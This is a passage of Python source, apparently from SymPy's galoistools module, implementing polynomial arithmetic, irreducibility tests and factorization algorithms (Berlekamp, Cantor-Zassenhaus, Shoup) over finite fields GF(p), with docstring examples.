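# skipped, so the helper reduces to gf_pow_mod(f, (p - 1)//2, g, p, K); e.g.
# for f = x + 2 and g = x**2 + 2*x + 1 over GF(5),
# gf_pow_mod([1, 2], 2, [1, 2, 1], 5, ZZ) == [2, 3].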
def gf_pow_mod(f, n, g, p, K):
"""
Compute ``f**n`` in ``GF(p)[x]/(g)`` using repeated squaring.
Given polynomials ``f`` and ``g`` in ``GF(p)[x]`` and a non-negative
integer ``n``, efficiently computes ``f**n (mod g)`` i.e. the remainder
of ``f**n`` from division by ``g``, using the repeated squaring algorithm.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_pow_mod
>>> gf_pow_mod(ZZ.map([3, 2, 4]), 3, ZZ.map([1, 1]), 5, ZZ)
[]
References
==========
1. [Gathen99]_
"""
if not n:
return [K.one]
elif n == 1:
return gf_rem(f, g, p, K)
elif n == 2:
return gf_rem(gf_sqr(f, p, K), g, p, K)
h = [K.one]
while True:
if n & 1:
h = gf_mul(h, f, p, K)
h = gf_rem(h, g, p, K)
n -= 1
n >>= 1
if not n:
break
f = gf_sqr(f, p, K)
f = gf_rem(f, g, p, K)
return h
def gf_gcd(f, g, p, K):
"""
Euclidean Algorithm in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_gcd
>>> gf_gcd(ZZ.map([3, 2, 4]), ZZ.map([2, 2, 3]), 5, ZZ)
[1, 3]
"""
while g:
f, g = g, gf_rem(f, g, p, K)
return gf_monic(f, p, K)[1]
def gf_lcm(f, g, p, K):
"""
Compute polynomial LCM in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_lcm
>>> gf_lcm(ZZ.map([3, 2, 4]), ZZ.map([2, 2, 3]), 5, ZZ)
[1, 2, 0, 4]
"""
if not f or not g:
return []
h = gf_quo(gf_mul(f, g, p, K),
gf_gcd(f, g, p, K), p, K)
return gf_monic(h, p, K)[1]
def gf_cofactors(f, g, p, K):
"""
Compute polynomial GCD and cofactors in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_cofactors
>>> gf_cofactors(ZZ.map([3, 2, 4]), ZZ.map([2, 2, 3]), 5, ZZ)
([1, 3], [3, 3], [2, 1])
"""
if not f and not g:
return ([], [], [])
h = gf_gcd(f, g, p, K)
return (h, gf_quo(f, h, p, K),
gf_quo(g, h, p, K))
def gf_gcdex(f, g, p, K):
"""
Extended Euclidean Algorithm in ``GF(p)[x]``.
Given polynomials ``f`` and ``g`` in ``GF(p)[x]``, computes polynomials
``s``, ``t`` and ``h``, such that ``h = gcd(f, g)`` and ``s*f + t*g = h``.
The typical application of EEA is solving polynomial diophantine equations.
Consider polynomials ``f = (x + 7) (x + 1)``, ``g = (x + 7) (x**2 + 1)``
in ``GF(11)[x]``. Application of Extended Euclidean Algorithm gives::
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_gcdex, gf_mul, gf_add
>>> s, t, g = gf_gcdex(ZZ.map([1, 8, 7]), ZZ.map([1, 7, 1, 7]), 11, ZZ)
>>> s, t, g
([5, 6], [6], [1, 7])
As result we obtained polynomials ``s = 5*x + 6`` and ``t = 6``, and
additionally ``gcd(f, g) = x + 7``. This is correct because::
>>> S = gf_mul(s, ZZ.map([1, 8, 7]), 11, ZZ)
>>> T = gf_mul(t, ZZ.map([1, 7, 1, 7]), 11, ZZ)
>>> gf_add(S, T, 11, ZZ) == [1, 7]
True
References
==========
1. [Gathen99]_
"""
if not (f or g):
return [K.one], [], []
p0, r0 = gf_monic(f, p, K)
p1, r1 = gf_monic(g, p, K)
if not f:
return [], [K.invert(p1, p)], r1
if not g:
return [K.invert(p0, p)], [], r0
s0, s1 = [K.invert(p0, p)], []
t0, t1 = [], [K.invert(p1, p)]
while True:
Q, R = gf_div(r0, r1, p, K)
if not R:
break
(lc, r1), r0 = gf_monic(R, p, K), r1
inv = K.invert(lc, p)
s = gf_sub_mul(s0, s1, Q, p, K)
t = gf_sub_mul(t0, t1, Q, p, K)
s1, s0 = gf_mul_ground(s, inv, p, K), s1
t1, t0 = gf_mul_ground(t, inv, p, K), t1
return s1, t1, r1
def gf_monic(f, p, K):
"""
Compute LC and a monic polynomial in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_monic
>>> gf_monic(ZZ.map([3, 2, 4]), 5, ZZ)
(3, [1, 4, 3])
"""
if not f:
return K.zero, []
else:
lc = f[0]
if K.is_one(lc):
return lc, list(f)
else:
return lc, gf_quo_ground(f, lc, p, K)
def gf_diff(f, p, K):
"""
Differentiate polynomial in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_diff
>>> gf_diff([3, 2, 4], 5, ZZ)
[1, 2]
"""
df = gf_degree(f)
h, n = [K.zero]*df, df
for coeff in f[:-1]:
coeff *= K(n)
coeff %= p
if coeff:
h[df - n] = coeff
n -= 1
return gf_strip(h)
def gf_eval(f, a, p, K):
"""
Evaluate ``f(a)`` in ``GF(p)`` using Horner scheme.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_eval
>>> gf_eval([3, 2, 4], 2, 5, ZZ)
0
"""
result = K.zero
for c in f:
result *= a
result += c
result %= p
return result
def gf_multi_eval(f, A, p, K):
"""
Evaluate ``f(a)`` for ``a`` in ``[a_1, ..., a_n]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_multi_eval
>>> gf_multi_eval([3, 2, 4], [0, 1, 2, 3, 4], 5, ZZ)
[4, 4, 0, 2, 0]
"""
return [ gf_eval(f, a, p, K) for a in A ]
def gf_compose(f, g, p, K):
"""
Compute polynomial composition ``f(g)`` in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_compose
>>> gf_compose([3, 2, 4], [2, 2, 2], 5, ZZ)
[2, 4, 0, 3, 0]
"""
if len(g) <= 1:
return gf_strip([gf_eval(f, gf_LC(g, K), p, K)])
if not f:
return []
h = [f[0]]
for c in f[1:]:
h = gf_mul(h, g, p, K)
h = gf_add_ground(h, c, p, K)
return h
def gf_compose_mod(g, h, f, p, K):
"""
Compute polynomial composition ``g(h)`` in ``GF(p)[x]/(f)``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_compose_mod
>>> gf_compose_mod(ZZ.map([3, 2, 4]), ZZ.map([2, 2, 2]), ZZ.map([4, 3]), 5, ZZ)
[4]
"""
if not g:
return []
comp = [g[0]]
for a in g[1:]:
comp = gf_mul(comp, h, p, K)
comp = gf_add_ground(comp, a, p, K)
comp = gf_rem(comp, f, p, K)
return comp
def gf_trace_map(a, b, c, n, f, p, K):
"""
Compute polynomial trace map in ``GF(p)[x]/(f)``.
Given a polynomial ``f`` in ``GF(p)[x]``, polynomials ``a``, ``b``,
``c`` in the quotient ring ``GF(p)[x]/(f)`` such that ``b = c**t
(mod f)`` for some positive power ``t`` of ``p``, and a positive
integer ``n``, returns a mapping::
a -> a**t**n, a + a**t + a**t**2 + ... + a**t**n (mod f)
In factorization context, ``b = x**p mod f`` and ``c = x mod f``.
This way we can efficiently compute trace polynomials in equal
degree factorization routine, much faster than with other methods,
like iterated Frobenius algorithm, for large degrees.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_trace_map
>>> gf_trace_map([1, 2], [4, 4], [1, 1], 4, [3, 2, 4], 5, ZZ)
([1, 3], [1, 3])
References
==========
1. [Gathen92]_
"""
u = gf_compose_mod(a, b, f, p, K)
v = b
if n & 1:
U = gf_add(a, u, p, K)
V = b
else:
U = a
V = c
n >>= 1
while n:
u = gf_add(u, gf_compose_mod(u, v, f, p, K), p, K)
v = gf_compose_mod(v, v, f, p, K)
if n & 1:
U = gf_add(U, gf_compose_mod(u, V, f, p, K), p, K)
V = gf_compose_mod(v, V, f, p, K)
n >>= 1
return gf_compose_mod(a, V, f, p, K), U
def _gf_trace_map(f, n, g, b, p, K):
"""
utility for ``gf_edf_shoup``
"""
f = gf_rem(f, g, p, K)
h = f
r = f
for i in range(1, n):
h = gf_frobenius_map(h, g, b, p, K)
r = gf_add(r, h, p, K)
r = gf_rem(r, g, p, K)
return r
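# Note (added): the loop above accumulates the Frobenius-power sum
# f + f**p + f**(p**2) + ... + f**(p**(n - 1)) (mod g), reusing the
# precomputed monomial base ``b`` for each power-of-p step.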
def gf_random(n, p, K):
"""
Generate a random polynomial in ``GF(p)[x]`` of degree ``n``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_random
>>> gf_random(10, 5, ZZ) #doctest: +SKIP
[1, 2, 3, 2, 1, 1, 1, 2, 0, 4, 2]
"""
return [K.one] + [ K(int(uniform(0, p))) for i in range(0, n) ]
def gf_irreducible(n, p, K):
"""
Generate random irreducible polynomial of degree ``n`` in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_irreducible
>>> gf_irreducible(10, 5, ZZ) #doctest: +SKIP
[1, 4, 2, 2, 3, 2, 4, 1, 4, 0, 4]
"""
while True:
f = gf_random(n, p, K)
if gf_irreducible_p(f, p, K):
return f
def gf_irred_p_ben_or(f, p, K):
"""
Ben-Or's polynomial irreducibility test over finite fields.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_irred_p_ben_or
>>> gf_irred_p_ben_or(ZZ.map([1, 4, 2, 2, 3, 2, 4, 1, 4, 0, 4]), 5, ZZ)
True
>>> gf_irred_p_ben_or(ZZ.map([3, 2, 4]), 5, ZZ)
False
"""
n = gf_degree(f)
if n <= 1:
return True
_, f = gf_monic(f, p, K)
if n < 5:
H = h = gf_pow_mod([K.one, K.zero], p, f, p, K)
for i in range(0, n//2):
g = gf_sub(h, [K.one, K.zero], p, K)
if gf_gcd(f, g, p, K) == [K.one]:
h = gf_compose_mod(h, H, f, p, K)
else:
return False
else:
b = gf_frobenius_monomial_base(f, p, K)
H = h = gf_frobenius_map([K.one, K.zero], f, b, p, K)
for i in range(0, n//2):
g = gf_sub(h, [K.one, K.zero], p, K)
if gf_gcd(f, g, p, K) == [K.one]:
h = gf_frobenius_map(h, f, b, p, K)
else:
return False
return True
def gf_irred_p_rabin(f, p, K):
"""
Rabin's polynomial irreducibility test over finite fields.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_irred_p_rabin
>>> gf_irred_p_rabin(ZZ.map([1, 4, 2, 2, 3, 2, 4, 1, 4, 0, 4]), 5, ZZ)
True
>>> gf_irred_p_rabin(ZZ.map([3, 2, 4]), 5, ZZ)
False
"""
n = gf_degree(f)
if n <= 1:
return True
_, f = gf_monic(f, p, K)
x = [K.one, K.zero]
indices = { n//d for d in factorint(n) }
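    # Rabin's criterion: check gcd(f, x**(p**(n//d)) - x) == 1 for every prime
    # divisor d of n, then verify x**(p**n) == x (mod f) at the end.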
b = gf_frobenius_monomial_base(f, p, K)
h = b[1]
for i in range(1, n):
if i in indices:
g = gf_sub(h, x, p, K)
if gf_gcd(f, g, p, K) != [K.one]:
return False
h = gf_frobenius_map(h, f, b, p, K)
return h == x
_irred_methods = {
'ben-or': gf_irred_p_ben_or,
'rabin': gf_irred_p_rabin,
}
def gf_irreducible_p(f, p, K):
"""
Test irreducibility of a polynomial ``f`` in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_irreducible_p
>>> gf_irreducible_p(ZZ.map([1, 4, 2, 2, 3, 2, 4, 1, 4, 0, 4]), 5, ZZ)
True
>>> gf_irreducible_p(ZZ.map([3, 2, 4]), 5, ZZ)
False
"""
method = query('GF_IRRED_METHOD')
if method is not None:
irred = _irred_methods[method](f, p, K)
else:
irred = gf_irred_p_rabin(f, p, K)
return irred
def gf_sqf_p(f, p, K):
"""
Return ``True`` if ``f`` is square-free in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_sqf_p
>>> gf_sqf_p(ZZ.map([3, 2, 4]), 5, ZZ)
True
>>> gf_sqf_p(ZZ.map([2, 4, 4, 2, 2, 1, 4]), 5, ZZ)
False
"""
_, f = gf_monic(f, p, K)
if not f:
return True
else:
return gf_gcd(f, gf_diff(f, p, K), p, K) == [K.one]
def gf_sqf_part(f, p, K):
"""
Return square-free part of a ``GF(p)[x]`` polynomial.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_sqf_part
>>> gf_sqf_part(ZZ.map([1, 1, 3, 0, 1, 0, 2, 2, 1]), 5, ZZ)
[1, 4, 3]
"""
_, sqf = gf_sqf_list(f, p, K)
g = [K.one]
for f, _ in sqf:
g = gf_mul(g, f, p, K)
return g
def gf_sqf_list(f, p, K, all=False):
"""
Return the square-free decomposition of a ``GF(p)[x]`` polynomial.
Given a polynomial ``f`` in ``GF(p)[x]``, returns the leading coefficient
of ``f`` and a square-free decomposition ``f_1**e_1 f_2**e_2 ... f_k**e_k``
such that all ``f_i`` are monic polynomials and ``(f_i, f_j)`` for ``i != j``
are co-prime and ``e_1 ... e_k`` are given in increasing order. All trivial
terms (i.e. ``f_i = 1``) aren't included in the output.
Consider polynomial ``f = x**11 + 1`` over ``GF(11)[x]``::
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import (
... gf_from_dict, gf_diff, gf_sqf_list, gf_pow,
... )
... # doctest: +NORMALIZE_WHITESPACE
>>> f = gf_from_dict({11: ZZ(1), 0: ZZ(1)}, 11, ZZ)
Note that ``f'(x) = 0``::
>>> gf_diff(f, 11, ZZ)
[]
    This phenomenon doesn't happen in characteristic zero. However we can
    still compute the square-free decomposition of ``f`` using ``gf_sqf_list()``::
>>> gf_sqf_list(f, 11, ZZ)
(1, [([1, 1], 11)])
We obtained factorization ``f = (x + 1)**11``. This is correct because::
>>> gf_pow([1, 1], 11, 11, ZZ) == f
True
References
==========
1. [Geddes92]_
"""
n, sqf, factors, r = 1, False, [], int(p)
lc, f = gf_monic(f, p, K)
if gf_degree(f) < 1:
return lc, []
while True:
F = gf_diff(f, p, K)
if F != []:
g = gf_gcd(f, F, p, K)
h = gf_quo(f, g, p, K)
i = 1
while h != [K.one]:
G = gf_gcd(g, h, p, K)
H = gf_quo(h, G, p, K)
if gf_degree(H) > 0:
factors.append((H, i*n))
g, h, i = gf_quo(g, G, p, K), G, i + 1
if g == [K.one]:
sqf = True
else:
f = g
if not sqf:
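            # Here f' == 0, so f = g(x**p) for some g; since a**p == a in GF(p),
            # the p-th root is read off by keeping every r-th coefficient.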
d = gf_degree(f) // r
for i in range(0, d + 1):
f[i] = f[i*r]
f, n = f[:d + 1], n*r
else:
break
if all:
raise ValueError("'all=True' is not supported yet")
return lc, factors
def gf_Qmatrix(f, p, K):
"""
Calculate Berlekamp's ``Q`` matrix.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_Qmatrix
>>> gf_Qmatrix([3, 2, 4], 5, ZZ)
[[1, 0],
[3, 4]]
>>> gf_Qmatrix([1, 0, 0, 0, 1], 5, ZZ)
[[1, 0, 0, 0],
[0, 4, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 4]]
"""
n, r = gf_degree(f), int(p)
q = [K.one] + [K.zero]*(n - 1)
Q = [list(q)] + [[]]*(n - 1)
for i in range(1, (n - 1)*r + 1):
qq, c = [(-q[-1]*f[-1]) % p], q[-1]
for j in range(1, n):
qq.append((q[j - 1] - c*f[-j - 1]) % p)
if not (i % r):
Q[i//r] = list(qq)
q = qq
return Q
def gf_Qbasis(Q, p, K):
"""
Compute a basis of the kernel of ``Q``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_Qmatrix, gf_Qbasis
>>> gf_Qbasis(gf_Qmatrix([1, 0, 0, 0, 1], 5, ZZ), 5, ZZ)
[[1, 0, 0, 0], [0, 0, 1, 0]]
>>> gf_Qbasis(gf_Qmatrix([3, 2, 4], 5, ZZ), 5, ZZ)
[[1, 0]]
"""
Q, n = [ list(q) for q in Q ], len(Q)
for k in range(0, n):
Q[k][k] = (Q[k][k] - K.one) % p
for k in range(0, n):
for i in range(k, n):
if Q[k][i]:
break
else:
continue
inv = K.invert(Q[k][i], p)
for j in range(0, n):
Q[j][i] = (Q[j][i]*inv) % p
for j in range(0, n):
t = Q[j][k]
Q[j][k] = Q[j][i]
Q[j][i] = t
for i in range(0, n):
if i != k:
q = Q[k][i]
for j in range(0, n):
Q[j][i] = (Q[j][i] - Q[j][k]*q) % p
for i in range(0, n):
for j in range(0, n):
if i == j:
Q[i][j] = (K.one - Q[i][j]) % p
else:
Q[i][j] = (-Q[i][j]) % p
basis = []
for q in Q:
if any(q):
basis.append(q)
return basis
def gf_berlekamp(f, p, K):
"""
Factor a square-free ``f`` in ``GF(p)[x]`` for small ``p``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_berlekamp
>>> gf_berlekamp([1, 0, 0, 0, 1], 5, ZZ)
[[1, 0, 2], [1, 0, 3]]
"""
Q = gf_Qmatrix(f, p, K)
V = gf_Qbasis(Q, p, K)
for i, v in enumerate(V):
V[i] = gf_strip(list(reversed(v)))
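    # Every basis polynomial v satisfies v**p == v (mod f), so f splits as the
    # product of gcd(f, v - s) over s in GF(p); refine until the number of
    # factors equals dim(V), the number of irreducible factors of f.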
factors = [f]
for k in range(1, len(V)):
for f in list(factors):
s = K.zero
while s < p:
g = gf_sub_ground(V[k], s, p, K)
h = gf_gcd(f, g, p, K)
if h != [K.one] and h != f:
factors.remove(f)
f = gf_quo(f, h, p, K)
factors.extend([f, h])
if len(factors) == len(V):
return _sort_factors(factors, multiple=False)
s += K.one
return _sort_factors(factors, multiple=False)
def gf_ddf_zassenhaus(f, p, K):
"""
Cantor-Zassenhaus: Deterministic Distinct Degree Factorization
Given a monic square-free polynomial ``f`` in ``GF(p)[x]``, computes
partial distinct degree factorization ``f_1 ... f_d`` of ``f`` where
``deg(f_i) != deg(f_j)`` for ``i != j``. The result is returned as a
list of pairs ``(f_i, e_i)`` where ``deg(f_i) > 0`` and ``e_i > 0``
is an argument to the equal degree factorization routine.
Consider the polynomial ``x**15 - 1`` in ``GF(11)[x]``::
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_from_dict
>>> f = gf_from_dict({15: ZZ(1), 0: ZZ(-1)}, 11, ZZ)
Distinct degree factorization gives::
>>> from sympy.polys.galoistools import gf_ddf_zassenhaus
>>> gf_ddf_zassenhaus(f, 11, ZZ)
[([1, 0, 0, 0, 0, 10], 1), ([1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1], 2)]
which means ``x**15 - 1 = (x**5 - 1) (x**10 + x**5 + 1)``. To obtain
factorization into irreducibles, use equal degree factorization
procedure (EDF) with each of the factors.
References
==========
1. [Gathen99]_
2. [Geddes92]_
"""
i, g, factors = 1, [K.one, K.zero], []
b = gf_frobenius_monomial_base(f, p, K)
while 2*i <= gf_degree(f):
g = gf_frobenius_map(g, f, b, p, K)
h = gf_gcd(f, gf_sub(g, [K.one, K.zero], p, K), p, K)
if h != [K.one]:
factors.append((h, i))
f = gf_quo(f, h, p, K)
g = gf_rem(g, f, p, K)
b = gf_frobenius_monomial_base(f, p, K)
i += 1
if f != [K.one]:
return factors + [(f, gf_degree(f))]
else:
return factors
def gf_edf_zassenhaus(f, n, p, K):
"""
Cantor-Zassenhaus: Probabilistic Equal Degree Factorization
Given a monic square-free polynomial ``f`` in ``GF(p)[x]`` and
an integer ``n``, such that ``n`` divides ``deg(f)``, returns all
irreducible factors ``f_1,...,f_d`` of ``f``, each of degree ``n``.
EDF procedure gives complete factorization over Galois fields.
Consider the square-free polynomial ``f = x**3 + x**2 + x + 1`` in
``GF(5)[x]``. Let's compute its irreducible factors of degree one::
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_edf_zassenhaus
>>> gf_edf_zassenhaus([1,1,1,1], 1, 5, ZZ)
[[1, 1], [1, 2], [1, 3]]
References
==========
1. [Gathen99]_
2. [Geddes92]_
"""
factors, q = [f], int(p)
if gf_degree(f) <= n:
return factors
N = gf_degree(f) // n
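    # Each random r splits f with probability about 1/2: for odd p through
    # gcd(f, r**((p**n - 1)//2) - 1), for p = 2 through the trace of r into GF(2).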
if p != 2:
b = gf_frobenius_monomial_base(f, p, K)
while len(factors) < N:
r = gf_random(2*n - 1, p, K)
if p == 2:
h = r
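            # trace of r into GF(2): h = r + r**2 + ... + r**(2**(n - 1))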
            for i in range(n - 1):
r = gf_pow_mod(r, 2, f, p, K)
h = gf_add(h, r, p, K)
g = gf_gcd(f, h, p, K)
else:
h = _gf_pow_pnm1d2(r, n, f, b, p, K)
g = gf_gcd(f, gf_sub_ground(h, K.one, p, K), p, K)
if g != [K.one] and g != f:
factors = gf_edf_zassenhaus(g, n, p, K) \
+ gf_edf_zassenhaus(gf_quo(f, g, p, K), n, p, K)
return _sort_factors(factors, multiple=False)
def gf_ddf_shoup(f, p, K):
"""
Kaltofen-Shoup: Deterministic Distinct Degree Factorization
Given a monic square-free polynomial ``f`` in ``GF(p)[x]``, computes
partial distinct degree factorization ``f_1,...,f_d`` of ``f`` where
``deg(f_i) != deg(f_j)`` for ``i != j``. The result is returned as a
list of pairs ``(f_i, e_i)`` where ``deg(f_i) > 0`` and ``e_i > 0``
is an argument to the equal degree factorization routine.
This algorithm is an improved version of Zassenhaus algorithm for
large ``deg(f)`` and modulus ``p`` (especially for ``deg(f) ~ lg(p)``).
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_ddf_shoup, gf_from_dict
>>> f = gf_from_dict({6: ZZ(1), 5: ZZ(-1), 4: ZZ(1), 3: ZZ(1), 1: ZZ(-1)}, 3, ZZ)
>>> gf_ddf_shoup(f, 3, ZZ)
[([1, 1, 0], 1), ([1, 1, 0, 1, 2], 2)]
References
==========
1. [Kaltofen98]_
2. [Shoup95]_
3. [Gathen92]_
"""
n = gf_degree(f)
k = int(_ceil(_sqrt(n//2)))
b = gf_frobenius_monomial_base(f, p, K)
h = gf_frobenius_map([K.one, K.zero], f, b, p, K)
# U[i] = x**(p**i)
U = [[K.one, K.zero], h] + [K.zero]*(k - 1)
for i in range(2, k + 1):
U[i] = gf_frobenius_map(U[i-1], f, b, p, K)
h, U = U[k], U[:k]
# V[i] = x**(p**(k*(i+1)))
V = [h] + [K.zero]*(k - 1)
for i in range(1, k):
V[i] = gf_compose_mod(V[i - 1], h, f, p, K)
factors = []
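    # Giant steps: for each v = x**(p**(k*(i+1))) multiply all differences v - u
    # into one product and take a single gcd with f, then split that gcd back
    # into per-degree factors by walking U in reverse.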
for i, v in enumerate(V):
h, j = [K.one], k - 1
for u in U:
g = gf_sub(v, u, p, K)
h = gf_mul(h, g, p, K)
h = gf_rem(h, f, p, K)
g = gf_gcd(f, h, p, K)
f = gf_quo(f, g, p, K)
for u in reversed(U):
h = gf_sub(v, u, p, K)
F = gf_gcd(g, h, p, K)
if F != [K.one]:
factors.append((F, k*(i + 1) - j))
g, j = gf_quo(g, F, p, K), j - 1
if f != [K.one]:
factors.append((f, gf_degree(f)))
return factors
def gf_edf_shoup(f, n, p, K):
"""
Gathen-Shoup: Probabilistic Equal Degree Factorization
Given a monic square-free polynomial ``f`` in ``GF(p)[x]`` and integer
``n`` such that ``n`` divides ``deg(f)``, returns all irreducible factors
``f_1,...,f_d`` of ``f``, each of degree ``n``. This is a complete
factorization over Galois fields.
This algorithm is an improved version of Zassenhaus algorithm for
large ``deg(f)`` and modulus ``p`` (especially for ``deg(f) ~ lg(p)``).
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_edf_shoup
>>> gf_edf_shoup(ZZ.map([1, 2837, 2277]), 1, 2917, ZZ)
[[1, 852], [1, 1985]]
References
==========
1. [Shoup91]_
2. [Gathen92]_
"""
N, q = gf_degree(f), int(p)
if not N:
return []
if N <= n:
return [f]
factors, x = [f], [K.one, K.zero]
r = gf_random(N - 1, p, K)
if p == 2:
h = gf_pow_mod(x, q, f, p, K)
H = gf_trace_map(r, h, x, n - 1, f, p, K)[1]
h1 = gf_gcd(f, H, p, K)
h2 = gf_quo(f, h1, p, K)
factors = gf_edf_shoup(h1, n, p, K) \
+ gf_edf_shoup(h2, n, p, K)
else:
b = gf_frobenius_monomial_base(f, p, K)
H = _gf_trace_map(r, n, f, b, p, K)
h = gf_pow_mod(H, (q - 1)//2, f, p, K)
h1 = gf_gcd(f, h, p, K)
h2 = gf_gcd(f, gf_sub_ground(h, K.one, p, K), p, K)
h3 = gf_quo(f, gf_mul(h1, h2, p, K), p, K)
factors = gf_edf_shoup(h1, n, p, K) \
+ gf_edf_shoup(h2, n, p, K) \
+ gf_edf_shoup(h3, n, p, K)
return _sort_factors(factors, multiple=False)
def gf_zassenhaus(f, p, K):
"""
Factor a square-free ``f`` in ``GF(p)[x]`` for medium ``p``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_zassenhaus
>>> gf_zassenhaus(ZZ.map([1, 4, 3]), 5, ZZ)
[[1, 1], [1, 3]]
"""
factors = []
for factor, n in gf_ddf_zassenhaus(f, p, K):
factors += gf_edf_zassenhaus(factor, n, p, K)
return _sort_factors(factors, multiple=False)
def gf_shoup(f, p, K):
"""
Factor a square-free ``f`` in ``GF(p)[x]`` for large ``p``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_shoup
>>> gf_shoup(ZZ.map([1, 4, 3]), 5, ZZ)
[[1, 1], [1, 3]]
"""
factors = []
for factor, n in gf_ddf_shoup(f, p, K):
factors += gf_edf_shoup(factor, n, p, K)
return _sort_factors(factors, multiple=False)
_factor_methods = {
'berlekamp': gf_berlekamp, # ``p`` : small
'zassenhaus': gf_zassenhaus, # ``p`` : medium
'shoup': gf_shoup, # ``p`` : large
}
def gf_factor_sqf(f, p, K, method=None):
"""
Factor a square-free polynomial ``f`` in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_factor_sqf
>>> gf_factor_sqf(ZZ.map([3, 2, 4]), 5, ZZ)
(3, [[1, 1], [1, 3]])
"""
lc, f = gf_monic(f, p, K)
if gf_degree(f) < 1:
return lc, []
method = method or query('GF_FACTOR_METHOD')
if method is not None:
factors = _factor_methods[method](f, p, K)
else:
factors = gf_zassenhaus(f, p, K)
return lc, factors
def gf_factor(f, p, K):
"""
Factor (non square-free) polynomials in ``GF(p)[x]``.
Given a possibly non square-free polynomial ``f`` in ``GF(p)[x]``,
returns its complete factorization into irreducibles::
f_1(x)**e_1 f_2(x)**e_2 ... f_d(x)**e_d
where each ``f_i`` is a monic polynomial and ``gcd(f_i, f_j) == 1``,
for ``i != j``. The result is given as a tuple consisting of the
leading coefficient of ``f`` and a list of factors of ``f`` with
their multiplicities.
The algorithm proceeds by first computing square-free decomposition
of ``f`` and then iteratively factoring each of square-free factors.
    Consider a non square-free polynomial ``f = (x + 2) (7*x + 1)**2`` in
    ``GF(11)[x]``. We obtain its factorization into irreducibles as follows::
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_factor
>>> gf_factor(ZZ.map([5, 2, 7, 2]), 11, ZZ)
(5, [([1, 2], 1), ([1, 8], 2)])
    We arrived at the factorization ``f = 5 (x + 2) (x + 8)**2``. We didn't
    recover the exact form of the input polynomial because we requested
    monic factors of ``f`` and its leading coefficient separately.
Square-free factors of ``f`` can be factored into irreducibles over
``GF(p)`` using three very different methods:
Berlekamp
efficient for very small values of ``p`` (usually ``p < 25``)
Cantor-Zassenhaus
efficient on average input and with "typical" ``p``
Shoup-Kaltofen-Gathen
efficient with very large inputs and modulus
If you want to use a specific factorization method, instead of the default
one, set ``GF_FACTOR_METHOD`` with one of ``berlekamp``, ``zassenhaus`` or
``shoup`` values.
References
==========
1. [Gathen99]_
"""
lc, f = gf_monic(f, p, K)
if gf_degree(f) < 1:
return lc, []
factors = []
for g, n in gf_sqf_list(f, p, K)[1]:
for h in gf_factor_sqf(g, p, K)[1]:
factors.append((h, n))
return lc, _sort_factors(factors)
def gf_value(f, a):
"""
Value of polynomial 'f' at 'a' in field R.
Examples
========
>>> from sympy.polys.galoistools import gf_value
>>> gf_value([1, 7, 2, 4], 11)
2204
"""
result = 0
for c in f:
result *= a
result += c
return result
def linear_congruence(a, b, m):
"""
Returns the values of x satisfying a*x congruent b mod(m)
    Here ``m`` is a positive integer and ``a``, ``b`` are natural numbers.
This function returns only those values of x which are distinct mod(m).
Examples
========
>>> from sympy.polys.galoistools import linear_congruence
>>> linear_congruence(3, 12, 15)
[4, 9, 14]
There are 3 solutions distinct mod(15) since gcd(a, m) = gcd(3, 15) = 3.
**Reference**
1) Wikipedia http://en.wikipedia.org/wiki/Linear_congruence_theorem
"""
from sympy.polys.polytools import gcdex
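    # Solvable iff g = gcd(a, m) divides b; the g solutions are spaced m//g apart.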
if a % m == 0:
if b % m == 0:
return list(range(m))
else:
return []
r, _, g = gcdex(a, m)
if b % g != 0:
return []
return [(r * b // g + t * m // g) % m for t in range(g)]
def _raise_mod_power(x, s, p, f):
"""
Used in gf_csolve to generate solutions of f(x) cong 0 mod(p**(s + 1))
from the solutions of f(x) cong 0 mod(p**s).
Examples
========
>>> from sympy.polys.galoistools import _raise_mod_power
>>> from sympy.polys.galoistools import csolve_prime
